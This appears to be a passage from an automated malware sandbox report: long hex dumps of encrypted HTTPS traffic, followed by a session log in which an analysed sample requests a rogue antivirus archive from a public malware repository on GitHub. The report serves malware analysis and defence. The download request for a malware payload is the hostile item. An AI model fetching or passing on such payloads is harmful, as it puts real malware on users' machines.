                                                                                                                                                2022-09-29 12:48:20 UTC295INData Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6
                                                                                                                                                Data Ascii: LtCy*G\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG|8:c*EUB>QeiO(_y-#*eoW;K&}@WMgqC'q|~EAqy,P1%-/?CZrpS4,:JGO x
                                                                                                                                                2022-09-29 12:48:20 UTC311INData Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed
                                                                                                                                                Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
                                                                                                                                                2022-09-29 12:48:20 UTC327INData Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e
                                                                                                                                                Data Ascii: ^ul%Rk/;zOT4;T|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(*FQpF$DK!\C)KQ-P(c=uX[PZzr*_'2t(1)^
                                                                                                                                                2022-09-29 12:48:20 UTC343INData Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60
                                                                                                                                                Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa|UnrgWUqp5=:a\>5HIU.;5~z/_|-aTg(9_qJk)?y]v7%|\-=A<`
                                                                                                                                                2022-09-29 12:48:20 UTC359INData Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4
                                                                                                                                                Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ|#NQ<l1&vJp0]IY#ZVX[j|!
                                                                                                                                                2022-09-29 12:48:20 UTC375INData Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b
                                                                                                                                                Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
                                                                                                                                                2022-09-29 12:48:20 UTC391INData Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50
                                                                                                                                                Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
                                                                                                                                                2022-09-29 12:48:20 UTC407INData Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8
                                                                                                                                                Data Ascii: =2$4\k)K]p:y*3;`/"KK>~z6L6unpG.ga'`k9@5K!u*ae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
                                                                                                                                                2022-09-29 12:48:20 UTC423INData Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83
                                                                                                                                                Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(|D/AUS3I( 1ZmLSHszV*o$RCSOq3Y"Mb7_2@97e!A'h0:&*JQmtAFV
                                                                                                                                                2022-09-29 12:48:20 UTC433INData Raw: b6 99 00 1e 44 bc 72 e4 68 c1 8e cb 5c 99 bc c6 e8 19 6c ee 00 4a 7c d0 9c da c6 a1 c2 c1 d8 94 81 24 49 c5 03 59 64 11 b9 12 a6 88 e1 42 6e dc 85 9d 1f 96 90 35 9a b8 cd bd 88 c5 23 2f b7 7e 37 21 a8 c3 ff 7c 3a 7a 29 0c e7 0b 07 55 21 cf 8c 28 55 c4 6e 9a 14 fe fd 3d fc 78 bc 99 13 15 f9 55 99 a0 4c d0 97 39 12 50 4d 1d 63 fb a8 88 87 06 41 af eb a8 aa 2f 89 c2 3d d7 61 7c 52 6a a5 ec ca 25 c3 46 a3 84 01 5f 70 9f e0 8a 82 63 29 4f 53 27 b3 8d c9 2c af 27 6d e3 a9 a8 ac f4 b5 28 20 13 0f 3a 91 0c 29 88 58 66 f7 d4 e7 ad c6 9b f2 07 84 31 1d 56 0b 5a f8 7a ab c5 33 52 dc 71 93 90 94 60 2f 6c df 67 f8 fc 60 c4 b8 a6 dd 10 a2 e7 fd 6a 73 e1 a3 6c e2 b2 82 e2 e0 fb 96 af 46 21 97 96 cc 48 9a 47 19 85 02 69 07 44 93 ce e1 1b fa af 2e 95 ad db 60 a0 a4 6f f0
                                                                                                                                                Data Ascii: Drh\lJ|$IYdBn5#/~7!|:z)U!(Un=xUL9PMcA/=a|Rj%F_pc)OS','m( :)Xf1VZz3Rq`/lg`jslF!HGiD.`o
                                                                                                                                                2022-09-29 12:48:20 UTC449INData Raw: 39 89 53 e4 fb 8e 75 c7 1d 43 23 52 ea d9 12 c0 94 04 72 ab ef f8 ad ef 47 9c a6 dd 7b c8 2d d1 3c a2 f2 e3 5f 8d c1 a5 d9 76 63 e1 aa ed 59 45 86 27 86 90 76 1b 49 fe e8 f3 b5 84 3e 86 fb 24 48 78 59 10 6d ed d5 32 ff 1a 6a 55 01 34 69 dd 6c 3f 26 c9 fa 9b d8 05 28 1c ff 96 25 c7 c0 22 9b ba e9 70 ff 04 2f 6c 06 a0 7b ea ee bc 62 47 0a be 40 e3 e9 21 18 d6 c5 fa 3c 5e 34 ee d6 76 70 71 6c d2 a7 20 b8 c7 dc 81 96 ed 51 04 65 37 89 56 90 89 c1 92 30 f9 c3 4e e6 28 a9 38 aa 4e e6 c7 b7 5b d9 f5 ca 03 b9 d2 e2 a8 8e bd f0 0b e0 ea c5 ed a4 e3 11 ce b6 bf 28 e9 6e 7e 39 36 a3 e4 c4 65 b2 b9 5c 01 bf 3f 00 08 88 3f 88 d0 ff 57 fa 94 79 40 97 46 c2 16 18 ab a7 2d 12 ab f2 01 6c b7 d4 5b 6f e2 ba fe ff 9c a7 ff be d2 a3 52 78 2a 2d 55 63 a3 3c d3 ad f9 1d be 54
                                                                                                                                                Data Ascii: 9SuC#RrG{-<_vcYE'vI>$HxYm2jU4il?&(%"p/l{bG@!<^4vpql Qe7V0N(8N[(n~96e\??Wy@F-l[oRx*-Uc<T
                                                                                                                                                2022-09-29 12:48:20 UTC465INData Raw: 42 16 68 7b c0 b1 db 7d e7 10 24 5a e5 c2 85 f2 90 ac c7 40 dc 90 3c ae ad 73 24 6f 9d ac 86 d5 44 f9 cf 14 a0 a4 49 98 15 0c e2 8c f0 a3 21 d6 d1 0f c9 e1 e1 b6 a9 4f 1c 3f fb b8 70 6e b6 e1 03 0a 62 d8 be 7c ff b5 fc 51 84 d6 b1 6c 0e de c0 77 df d7 34 69 fc c9 a4 6d db af ec 1b 92 42 b2 62 3d 49 f5 65 aa cd ae 21 69 74 d6 f3 a7 b4 e0 8f 2d ac 69 1c 20 26 0b f8 8a 4f 48 3b 85 f4 11 4b 42 ed 6e a5 d2 e2 4e c9 5d 10 53 29 4b 92 e0 be fa c0 fc ef 2d de ae 41 b3 bc 8c 43 c5 0d 5d 07 3a a6 1d 8d 6c 9b 29 f1 9a 5d 2b 4e b3 96 da e7 ed 84 16 4d a2 7f 8e 5d bf a3 e0 43 49 24 7b 02 db bb d6 93 96 cd 27 78 b3 6b 72 38 0a 3a fb 53 74 ca 29 59 bc fb 46 b9 86 d0 e9 95 9b 63 47 1e c6 c6 49 e7 30 bf c0 df e3 83 bc ae 6b df ac 19 9c f2 52 c0 5f 9a 66 1d 39 41 11 58 aa
                                                                                                                                                Data Ascii: Bh{}$Z@<s$oDI!O?pnb|Qlw4imBb=Ie!it-i &OH;KBnN]S)K-AC]:l)]+NM]CI${'xkr8:St)YFcGI0kR_f9AX
                                                                                                                                                2022-09-29 12:48:20 UTC481INData Raw: 72 ee ba fd cc 9c bd c3 4e 55 a7 63 d0 86 9d 8b 99 68 6b 69 f4 24 74 d2 30 8f 2b 58 03 cf f6 65 f7 49 ae 4d 71 a6 1b b9 40 50 a0 70 05 f6 93 2d f9 05 5b 26 c0 87 e6 d0 83 99 8b ac dc ef 50 cc bf 3e fb 0f ce 6e 75 12 da b9 bf 71 63 69 fc 8d 90 48 34 ca a1 08 ee 6c 4b 52 34 18 70 45 25 14 17 65 ff c8 41 d8 2e c7 d4 80 94 b3 f6 7f cb a9 e6 f7 a8 a9 0c df 50 a3 4e 2c 85 c5 05 ea f0 95 29 95 a1 0d ad df c9 1e 26 fe 1d 3e e0 eb ae 77 8d 7e b6 41 5f 12 c3 ab 4c 9e 49 8e b7 fd 39 3c 0b 41 cb 66 d0 fd 5f 99 f8 ae b4 1a f7 b0 7f d8 a2 c3 99 d0 59 e6 42 52 b3 f3 53 fd 1c 1f f3 05 a7 b1 5f 0a e3 f0 92 28 a6 9f 96 30 4b 85 b8 71 24 03 28 f8 e2 fb c5 1a 1f ca 40 34 32 7f c8 f8 34 93 d6 61 c1 8c 8b d2 c6 93 50 dd 1a 44 b5 34 79 db 97 bd c2 85 3d 0a d3 2a 67 bf f4 32 93
                                                                                                                                                Data Ascii: rNUchki$t0+XeIMq@Pp-[&P>nuqciH4lKR4pE%eA.PN,)&>w~A_LI9<Af_YBRS_(0Kq$(@424aPD4y=*g2
                                                                                                                                                2022-09-29 12:48:20 UTC497INData Raw: a7 bc 1b e7 4d 1a 9e c4 1a 3b b3 01 80 d3 e6 8d 37 53 68 3a 36 2f f9 ac f1 be ba cd e3 15 04 81 fb bf 53 e8 48 79 ac a6 fd 96 94 9b 90 5a dd 97 02 67 cf 2c 31 9c 6d 58 69 a4 b0 6a fc df 2a 53 2a 46 70 53 fa e3 b1 bb 1a f4 b0 1c b9 ce fb 6b 4e 23 19 b6 57 9e b9 1c bb dc 4b 13 6f ea 94 99 1d ed ed 05 4c 20 4d ad f7 2c 46 ce b8 af cc 78 27 07 e6 f6 b7 0d a4 cc 1a 60 99 c9 33 38 16 d3 7b bd 4b ed d2 9f 85 c1 2e c8 e1 33 2d 7b 56 b4 a8 dc 0d 0a a2 3d 13 9c 5c 90 d6 17 01 fd 5d 96 46 dd f8 4e 03 a9 7d 15 84 e4 f7 b2 4f 34 49 e2 3d 4b 31 85 14 a5 b1 8f da e8 c5 1d 81 ec 04 09 2f 81 21 ce 54 0e c7 40 36 ab 90 89 94 e1 bf f2 fc a6 89 10 60 40 ee db 31 2b 41 c8 ff da 5e ad a6 b1 45 b4 ed fe 89 b4 02 ca 63 c5 46 bf 19 b9 e7 1c e9 83 78 ee fd 7f 9d 1a 2e df a1 81 f5
                                                                                                                                                Data Ascii: M;7Sh:6/SHyZg,1mXij*S*FpSkN#WKoL M,Fx'`38{K.3-{V=\]FN}O4I=K1/!T@6`@1+A^EcFx.
                                                                                                                                                2022-09-29 12:48:20 UTC513INData Raw: 8b 6d 9b f4 38 89 f4 56 77 6b f2 bc 49 f3 b8 e8 ba 99 7d 9a ed d2 28 38 09 a5 94 9f 6b da e4 66 b4 ff 2e 44 d5 f8 c9 fd ea 54 5a 97 95 47 60 4c 8c 28 37 d6 08 9a 25 93 d8 3b b0 5c 25 e2 1f 91 cc 89 11 34 07 04 4b 63 80 91 eb eb 9a d6 b2 64 6f 51 ff 0f 6e 69 ab 2a fa 8c 47 4d 15 95 43 7e 29 4c c3 72 8e 65 69 43 01 9a 20 69 d8 ce fd 19 31 b6 e6 40 3b 43 be 95 82 cf 54 8b 60 fb 37 7d f3 cc ac 2d ba 4b 27 b5 95 32 cf 04 6b 4e c9 f9 df 27 2e e5 48 ac 79 c6 bf ea 45 1b 88 1c a0 77 de 4a 14 dd df d8 fa 2b c5 c8 8d 04 56 eb d1 f3 e4 53 72 9e 6d 7e b2 ad b1 d9 32 5f 46 6b a6 fa ea 8a 6f ab 71 9f 71 34 c6 41 ef 76 a0 d2 8b 39 65 c3 4a 6a 98 a1 99 9a 69 13 50 67 92 a0 1a 3c 29 dc d7 a2 cc 7c 96 28 0c a1 fd 72 96 8b bf a8 d9 bb ab 09 90 c8 8e ed 45 62 fb 23 e4 7d 82
                                                                                                                                                Data Ascii: m8VwkI}(8kf.DTZG`L(7%;\%4KcdoQni*GMC~)LreiC i1@;CT`7}-K'2kN'.HyEwJ+VSrm~2_Fkoqq4Av9eJjiPg<)|(rEb#}
                                                                                                                                                2022-09-29 12:48:20 UTC529INData Raw: d2 e9 66 6b 1b d4 0e f7 a6 f7 97 f2 66 41 3d 26 29 bc 5b 32 82 78 b3 b1 7e ef a5 2b 1b 04 51 1b 6b 1b 41 ec 19 66 b3 48 08 37 ae c6 9f ab 95 8b f7 53 3f 2a 30 66 a8 b8 55 94 bc c0 5b 53 54 da 48 87 0a dd 6a fd de f4 ff ec 44 6d ec 03 5e 9a e5 cf c6 99 4e a0 a2 25 f8 f7 ac bd 27 07 1a 6c 7c 52 64 f2 8b a6 95 81 63 62 45 76 79 64 ed 58 ed 94 51 51 7a 7d d5 d1 85 16 ed bf 2e 12 92 2d 4d 39 61 60 52 ec 57 92 80 a2 2c 94 dc 12 71 ce 72 cd c2 3c 72 01 9b ee 01 57 ae 9a 52 55 c3 8b 4f 38 25 06 36 8c c6 7d eb 9e e7 13 88 99 4e d2 4b 4c 16 20 b9 e2 20 28 d2 e7 e2 c9 e5 4f 70 b7 83 c5 0e 7a e4 68 74 a1 c0 99 66 a6 87 ea 64 c1 c9 23 ef 44 6a 5d 18 de 3d 08 f2 b3 b5 1a 17 b7 22 60 f8 ed f9 e6 c1 27 ae 5f c2 78 ca 55 78 1d 6c 06 cf 32 55 ea 8c 73 65 84 40 75 c6 48 61
                                                                                                                                                Data Ascii: fkfA=&)[2x~+QkAfH7S?*0fU[STHjDm^N%'l|RdcbEvydXQQz}.-M9a`RW,qr<rWRUO8%6}NKL (Opzhtfd#Dj]="`'_xUxl2Use@uHa
                                                                                                                                                2022-09-29 12:48:20 UTC545INData Raw: 25 f1 23 15 4a fb df 8c 18 8f 2f 39 7e f9 66 53 a2 e5 ed 16 1a b8 be d7 60 d7 81 35 91 15 9d 63 60 0c 7a 42 ac ce a1 e7 a9 12 54 13 69 54 45 38 ad 30 71 79 6c 20 74 44 2a c0 33 37 ff 7c 2b 17 4f 0a 61 56 f1 4a b6 c2 77 67 56 94 13 a4 78 1a 29 51 47 9f fb 62 0a d3 05 5f 68 14 cb c5 56 72 a0 6c dd 42 fb 9f fc d9 91 98 84 21 4d db 85 4d 99 a8 26 48 42 52 61 30 91 56 6e bb 50 4f a9 4f 9b c9 cd 2f 4f 6d bc 72 26 fd 03 e6 f0 25 a4 c2 6b 75 4d b2 90 fe ba c6 e0 53 da 58 f6 dd 9a 8c ff 8b 6a 12 df de 07 15 ee f5 cd e1 34 52 db fb 41 ec ee 01 07 6d 7f f3 a8 5a f6 c5 b7 18 10 60 69 66 43 fb 97 19 2a 7d 57 da 0e a3 17 8c e5 c0 f5 14 d7 a9 8a 02 52 88 25 bc ef 8e ba de 6d 81 2f 90 31 99 77 3f de 39 ba 7a b5 fa d2 68 84 70 66 e4 b5 f7 6c ac b0 9c 58 20 c2 0c 44 18 63
                                                                                                                                                Data Ascii: %#J/9~fS`5c`zBTiTE80qyl tD*37|+OaVJwgVx)QGb_hVrlB!MM&HBRa0VnPOO/Omr&%kuMSXj4RAmZ`ifC*}WR%m/1w?9zhpflX Dc
                                                                                                                                                2022-09-29 12:48:20 UTC561INData Raw: be 87 49 ef b4 ac 86 6d 69 50 97 71 49 d1 bb 8b 12 7e 16 3d 3b 51 c7 6a 1b ab 2f 36 bb 74 2f 76 3b b2 74 c1 3b af 1e e9 da 1f ca f4 c9 0a ae 46 1d 48 dc f7 89 6e fe 47 e1 dd 6d 8c bf cb 33 92 90 cd 24 e6 8c b8 99 43 f3 62 07 27 21 c4 b6 72 ca a2 a3 1a 7c 91 46 b6 23 94 3d 1e 48 57 87 bb 89 67 48 3d 1e 0a ce 2e 38 48 00 62 e9 3c 98 f9 dc 04 04 dd 54 9c 7c a1 9b 63 8f 17 bf 31 15 9d 34 41 5e 2d 2b bb 02 93 18 05 63 13 e4 c7 61 62 31 7e ea 08 46 ba 6a 74 e2 1c a0 7a 2d 4d ea d9 28 fa 72 09 a2 ec df d3 e6 5e 52 33 da e6 c9 69 52 31 93 2a 37 0f a9 5e 62 a3 3b 95 8a 13 e7 20 bd ef c6 04 fb 83 d0 f4 43 b2 44 5d 81 5d b7 78 c5 67 25 b1 9d 62 3b ce ab 37 aa 92 a3 41 f6 10 5e 17 bf 43 de 59 98 6d 7c d1 a3 32 12 25 6e 1d 70 eb 88 3b 05 d7 ad e7 d5 88 ab 4d 6d ae 31
                                                                                                                                                Data Ascii: ImiPqI~=;Qj/6t/v;t;FHnGm3$Cb'!r|F#=HWgH=.8Hb<T|c14A^-+cab1~Fjtz-M(r^R3iR1*7^b; CD]]xg%b;7A^CYm|2%np;Mm1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                70192.168.2.349757185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:43 UTC9865OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                71185.199.108.133443192.168.2.349757C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:43 UTC9865INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 813771
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "1678d463fe21840e0502334b52db05d49c7f0867ee8fb74db3e4927c4d982da5"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 3596:11E0C:3902DE:4007EA:6335934F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:43 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6964-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 2
                                                                                                                                                X-Timer: S1664455784.684049,VS0,VE0
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 64fb58289bca7f74424b984df5a522a5c6ef2296
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:43 GMT
                                                                                                                                                Source-Age: 280
